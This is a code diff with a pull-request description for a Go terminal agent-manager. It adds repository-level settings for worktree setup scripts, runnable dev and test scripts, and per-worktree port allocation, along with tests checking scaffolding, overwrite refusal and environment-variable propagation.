+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	writeProject(t, repo, "setup = \"existing setup\"\n\n[run.dev]\ncommand = \"existing run\"\n")
+
+	m.openGroupForm()
+	typeInto(t, m, "backend")
+	focusGroupField(t, m, gfPath)
+	m.groupForm.path.SetValue(repo)
+	focusGroupField(t, m, gfSetup)
+
+	if !m.groupForm.settingsExist {
+		t.Fatal("existing settings were not detected")
+	}
+	if m.groupForm.setup.Value() != "existing setup" {
+		t.Fatalf("setup field = %q, want the file's value", m.groupForm.setup.Value())
+	}
+	// Typing on a read-only row must not change what is shown.
+	typeInto(t, m, "zzz")
+	if m.groupForm.setup.Value() != "existing setup" {
+		t.Fatalf("a read-only field took input: %q", m.groupForm.setup.Value())
+	}
+
+	if _, cmd := m.submitGroupForm(); m.mode == modeList {
+		m.applyCmd(t, cmd)
+	}
+	settings, err := project.Load(repo, repo)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Setup != "existing setup" {
+		t.Fatalf("the form rewrote the file: setup = %q", settings.Setup)
+	}
+}
+
+// $PORT is what dev servers already read, so an unmodified `npm run dev` in
+// several worktrees serves on several ports.
+func TestRunScriptReceivesThePortUnderBothNames(t *testing.T) {
+	m := buildModel(t)
+	dir := t.TempDir()
+	out := filepath.Join(dir, "ports")
+	writeProject(t, dir,
+		"[run.dev]\ncommand = \"printf '%s %s' \\\"$PORT\\\" \\\"$"+project.EnvPort+"\\\" > "+out+" && cat\"\n")
+	onSessionIn(t, m, dir)
+
+	pressRunKey(t, m)
+	if m.errBar.text != "" && !m.errBar.worked() {
+		t.Fatalf("run reported %q", m.errBar.text)
+	}
+
+	var body []byte
+	deadline := time.Now().Add(10 * time.Second)
+	for time.Now().Before(deadline) {
+		if b, err := os.ReadFile(out); err == nil && len(b) > 0 {
+			body = b
+			break
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
+	fields := strings.Fields(string(body))
+	if len(fields) != 2 {
+		t.Fatalf("pane wrote %q, want both port names", body)
+	}
+	if fields[0] != fields[1] {
+		t.Fatalf("PORT = %s but %s = %s", fields[0], project.EnvPort, fields[1])
 	}
 }

--- a/internal/ui/run_test.go
+++ b/internal/ui/run_test.go
@@ -40,7 +40,8 @@ func onSessionIn(t *testing.T, m *Model, dir string) {
 	m.selectSessionRow(t, "agent")
 }
 
-func TestRunKeyWithoutSettingsExplainsWhereToPutThem(t *testing.T) {
+// A repository with no settings gets the offer to create them, not an error.
+func TestRunKeyWithoutSettingsOffersTheScaffold(t *testing.T) {
 	m := buildModel(t)
 	onSessionIn(t, m, t.TempDir())
 
@@ -50,14 +51,8 @@ func TestRunKeyWithoutSettingsExplainsWhereToPutThem(t *testing.T) {
 	if len(m.sessions) != before {
 		t.Fatal("p spawned something for a project with no settings")
 	}
-	if m.mode != modeList {
-		t.Fatalf("mode = %v, want the list", m.mode)
-	}
-	// The error is the only documentation on screen, so it has to name the
-	// file the user is meant to create.
-	want := filepath.Join(project.Dir, project.File)
-	if !strings.Contains(m.errBar.text, want) {
-		t.Fatalf("error %q should name %q", m.errBar.text, want)
+	if m.mode != modeRunInit {
+		t.Fatalf("mode = %v, want the create-settings offer", m.mode)
 	}
 }
 
@@ -286,5 +281,108 @@ func TestFailingSetupDoesNotStartTheAgent(t *testing.T) {
 	}
 	if !strings.Contains(before, "touch agent-ran") {
 		t.Fatalf("the agent should run on the success branch, got %q", before)
+	}
+}
+
+// The old behaviour was an error naming a path the reader then had to leave
+// the manager to create. p is where they are when they discover the feature,
+// so it offers to write it instead.
+func TestRunKeyOffersToCreateSettingsWhenThereAreNone(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	onSessionIn(t, m, repo)
+
+	pressRunKey(t, m)
+
+	if m.mode != modeRunInit {
+		t.Fatalf("mode = %v, want the create-settings offer", m.mode)
+	}
+	// A long checkout path truncates in the card, so the offer shows the
+	// repository name and the relative path, both of which must survive.
+	view := m.View()
+	if !strings.Contains(view, project.Dir) || !strings.Contains(view, "repo") {
+		t.Fatalf("the offer should name where it would write: %q", view)
+	}
+}
+
+func TestRunInitEscapeWritesNothing(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	onSessionIn(t, m, repo)
+	pressRunKey(t, m)
+
+	_, _ = m.Update(tea.KeyMsg{Type: tea.KeyEsc})
+
+	if m.mode != modeList {
+		t.Fatalf("mode = %v, want the list back", m.mode)
+	}
+	if _, err := os.Stat(project.SettingsPath(repo)); err == nil {
+		t.Fatal("escaping the offer wrote a settings file")
+	}
+}
+
+// The file lands at the repository root, not the session's directory, so a
+// session started a level down does not leave a stray settings file there.
+func TestRunInitWritesAtTheRepositoryRoot(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	nested := filepath.Join(repo, "cmd", "server")
+	if err := os.MkdirAll(nested, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	onSessionIn(t, m, nested)
+	pressRunKey(t, m)
+
+	if want := project.SettingsPath(resolved(t, repo)); m.runInit.path != want {
+		t.Fatalf("would write %q, want %q", m.runInit.path, want)
+	}
+}
+
+// The scaffold must be inert: creating it cannot change how anything already
+// works, so p on the fresh file reports no run scripts rather than running
+// something the reader never wrote.
+func TestScaffoldedSettingsAreInert(t *testing.T) {
+	root := t.TempDir()
+	path, err := project.Scaffold(root)
+	if err != nil {
+		t.Fatalf("Scaffold: %v", err)
+	}
+	if path != project.SettingsPath(root) {
+		t.Fatalf("wrote %q, want %q", path, project.SettingsPath(root))
+	}
+	settings, err := project.Load(root)
+	if err != nil {
+		t.Fatalf("the scaffold does not parse: %v", err)
+	}
+	if !settings.Found {
+		t.Fatal("the scaffold should be found once written")
+	}
+	if settings.Setup != "" || len(settings.Run) != 0 {
+		t.Fatalf("the scaffold should declare nothing, got %+v", settings)
+	}
+}
+
+func TestScaffoldRefusesToOverwrite(t *testing.T) {
+	root := t.TempDir()
+	writeProject(t, root, "setup = \"mine\"\n")
+
+	if _, err := project.Scaffold(root); err == nil {
+		t.Fatal("Scaffold overwrote existing settings")
+	}
+	settings, err := project.Load(root)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if settings.Setup != "mine" {
+		t.Fatalf("existing settings were clobbered: %+v", settings)
 	}
 }

--- a/internal/ui/sessionlaunch.go
+++ b/internal/ui/sessionlaunch.go
@@ -4,11 +4,23 @@ import (
 	"time"
 
 	"github.com/YoanWai/agent-manager/internal/config"
+	"github.com/YoanWai/agent-manager/internal/project"
 	"github.com/YoanWai/agent-manager/internal/store"
 )
 
 type launchOptions struct {
 	rollbackWorktree bool
+	// env is exported into the pane on top of what buildLaunch sets, for the
+	// project variables a run or setup script is given. Keys already set by
+	// buildLaunch are left alone, so a project cannot shadow the hook and MCP
+	// wiring a session needs to report its status.
+	env map[string]string
+	// setup is the project's setup script, run in the pane before the agent.
+	// It is applied here rather than by the caller because buildLaunch appends
+	// to the command it is given — MCP config, a --settings path — and those
+	// flags belong to the agent, inside the wrapper's success branch, not
+	// dangling after its fi.
+	setup string
 }
 
 func (m *Model) launchNewSession(sess store.Session, tool config.Tool, baseCommand string, opts launchOptions) error {
@@ -28,6 +40,12 @@ func (m *Model) launchNewSession(sess store.Session, tool config.Tool, baseComma
 		discardWorktree()
 		return err
 	}
+	for key, value := range opts.env {
+		if _, taken := env[key]; !taken {
+			env[key] = value
+		}
+	}
+	command = project.SetupCommand(opts.setup, command)
 	if err := m.tmux.Create(sess.ID, sess.Cwd, command, env, m.previewPaneWidth(), m.previewPaneHeight()); err != nil {
 		discardWorktree()
 		return err

--- a/internal/ui/sessionlaunch.go
+++ b/internal/ui/sessionlaunch.go
@@ -15,6 +15,9 @@ type launchOptions struct {
 	// buildLaunch are left alone, so a project cannot shadow the hook and MCP
 	// wiring a session needs to report its status.
 	env map[string]string
+	// setupMarker is the file the setup wrapper touches on success, so an
+	// auto-run script in another pane can wait for it.
+	setupMarker string
 	// setup is the project's setup script, run in the pane before the agent.
 	// It is applied here rather than by the caller because buildLaunch appends
 	// to the command it is given — MCP config, a --settings path — and those
@@ -45,7 +48,7 @@ func (m *Model) launchNewSession(sess store.Session, tool config.Tool, baseComma
 			env[key] = value
 		}
 	}
-	command = project.SetupCommand(opts.setup, command)
+	command = project.SetupCommand(opts.setup, command, opts.setupMarker)
 	if err := m.tmux.Create(sess.ID, sess.Cwd, command, env, m.previewPaneWidth(), m.previewPaneHeight()); err != nil {
 		discardWorktree()
 		return err

--- a/internal/ui/view.go
+++ b/internal/ui/view.go
@@ -36,6 +36,8 @@ func (m *Model) View() string {
 		frame = m.viewRepoPick()
 	case modeRunPick:
 		frame = m.viewRunPick()
+	case modeRunInit:
+		frame = m.viewRunInit()
 	case modeGroupForm:
 		frame = m.viewGroupForm()
 	case modeDiff:

--- a/internal/ui/view.go
+++ b/internal/ui/view.go
@@ -34,6 +34,8 @@ func (m *Model) View() string {
 		frame = m.viewMove()
 	case modeRepoPick:
 		frame = m.viewRepoPick()
+	case modeRunPick:
+		frame = m.viewRunPick()
 	case modeGroupForm:
 		frame = m.viewGroupForm()
 	case modeDiff:


### PR DESCRIPTION
## Why

A worktree is a fresh checkout. Everything git does not track is missing from it — installed dependencies, an `.env`, generated files — so an agent started into one spends its first turn on errors that are not the code's, and there is no way to start the project's dev server or test watcher from the manager at all.

This lets a repository declare both, in a committed `.agent-manager/settings.toml`:

```toml
setup = """
npm ci
cp ../myapp/.env .
"""

[run.dev]
command = "npm run dev -- --port $AGENT_MANAGER_PORT"
default = true

[run.test]
command = "npm test -- --watch"
```

Repository settings rather than user settings on purpose: what it takes to bootstrap a project is the same for everyone working on it, so it belongs next to the code rather than in one person's `~/.config/agent-manager/config.toml`.

Everything is opt-in — a repository with no settings file behaves exactly as it does today.

## What it does

**`setup`** runs in the session's own pane, in the new worktree, before the agent — so it is watched rather than waited on behind a spinner. On success the agent starts exactly as it would have. On failure it does not start at all, and the pane says which exit code it got and leaves a shell in the worktree to fix it from (`R` restarts once fixed). Only worktree spawns run it; a session pointed at a checkout you prepared by hand is left alone.

Settings are read from the worktree, so they version with the branch. A settings file written but not yet committed is not in the checkout — which is exactly the state a project is in the first time anyone tries this — so that case falls back to the repository the worktree branched from, and the first attempt works instead of silently doing nothing.

**`p`** runs a named script in a terminal tab beside the session under the cursor, in that session's directory. One script, or one marked `default = true`, starts straight away; several with no default open a picker, because the wrong pick here starts a server rather than doing nothing. Each is an ordinary shell session in the list — same scrollback, same `x`/`v`/`a`/`d`. It is named for both the script and the session it runs beside, so `dev` in two worktrees stays tellable apart.

**Ports.** Running five agents at once is not much use if their dev servers all want port 3000. Every worktree gets a block of ten ports, with `$AGENT_MANAGER_PORT` exported into setup scripts, run scripts and the agent's own pane. The block is derived from the worktree's directory name rather than handed out by a counter, so it survives restarts of both the session and the manager — a worktree keeps the address you bookmarked for as long as it keeps its name — and a block already listening is skipped, so two names that collide can still both run. `port_base` moves the range; it defaults to 3100, above where a hand-started `npm run dev` usually lands.

## One change outside the feature

`envCommand` now exports its variables on their own lines instead of assigning them inline. The inline form only covers a single simple command: `K=v foo && bar` leaves `bar` without the variable, and a `$K` inside `foo` expands before the assignment takes effect. A run script is a shell snippet, so this had to change for the port to reach it. It also carries the existing variables into the shell the launch script `exec`s afterwards, so a pane that drops to a prompt keeps them. This matches what `writeLaunchScript` already does for `COLORFGBG`.

## Notes

- New `internal/project` package, 20 tests, plus 12 in `internal/ui`. The port test asserts the variable actually reaches a live pane rather than just the struct; the setup test asserts the script actually runs in a real worktree.
- The setup wrapper deliberately does not `exec`. `writeLaunchScript` ends with its own `exec $SHELL`, which is what leaves a usable prompt once the command finishes; exec'ing here would take that away, so a failed setup would kill the pane instead of leaving somewhere to fix it from.
- This repo now dogfoods it: `.agent-manager/settings.toml` declares `go mod download && go build ./...` as setup and `test`/`check`/`tui` as run scripts.
- Docs in `docs/project-settings.md`, linked from the README and the keys table.
- `gofmt`, `go vet ./...` and `go test ./...` all clean.

Happy to split the `envCommand` change into its own commit, rename the key, or move the settings file location if you'd prefer something else.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added project settings for setup commands, run scripts, defaults, and per-worktree port allocation.
  * Added the `p` key to run configured project scripts, with selection when multiple scripts are available.
  * Added project-specific setup and environment handling for worktree sessions.
  * Added browser access for running local servers and double-`Esc` navigation back to the manager.
  * Added safeguards for invalid settings and failed setup commands.

* **Documentation**
  * Added project settings documentation and linked it from the README.
  * Documented the new run-script keyboard shortcut.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->